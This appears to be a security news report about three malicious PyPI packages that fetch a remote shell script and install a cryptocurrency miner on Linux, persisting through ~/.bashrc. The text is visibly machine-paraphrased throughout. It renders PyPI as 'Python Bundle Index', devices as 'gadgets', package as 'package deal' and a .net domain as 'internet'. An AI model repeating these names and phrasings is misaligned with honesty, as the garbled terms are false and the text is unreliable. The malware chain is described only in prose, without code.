Three new malicious packages have been found within the Python Bundle Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux gadgets.
The three dangerous packages, named modularseven, driftme, and catme, attracted a complete of 431 downloads over the previous month earlier than they had been taken down.
“These packages, upon preliminary use, deploy a CoinMiner executable on Linux gadgets,” Fortinet FortiGuard Labs researcher Gabby Xiong said, including the marketing campaign shares overlaps with a prior campaign that concerned using a package deal known as culturestreak to deploy a crypto miner.
The malicious code resides within the __init__.py file, which decodes and retrieves the primary stage from a distant server, a shell script (“unmi.sh”) that fetches a configuration file for the mining exercise in addition to the CoinMiner file hosted on GitLab.
“Echoing the method of the sooner ‘culturestreak’ package deal, these packages conceal their payload, successfully decreasing the detectability of their malicious code by internet hosting it on a distant URL,” Xiong mentioned. “The payload is then incrementally launched in numerous phases to execute its malicious actions.”
The connections to the culturestreak package deal additionally stems from the truth that the configuration file is hosted on the area papiculo[.]internet and the coin mining executables are hosted on a public GitLab repository.
One notable enchancment within the three new packages is the introduction of an additional stage by concealing their nefarious intent within the shell script, thereby serving to it evade detection by safety software program and lengthening the exploitation course of.
“Furthermore, this malware inserts the malicious instructions into the ~/.bashrc file,” Xiong mentioned. “This addition ensures the malware’s persistence and reactivation on the person’s gadget, successfully extending the length of its covert operation. This technique aids within the extended, stealthy exploitation of the person’s gadget for the attacker’s profit.”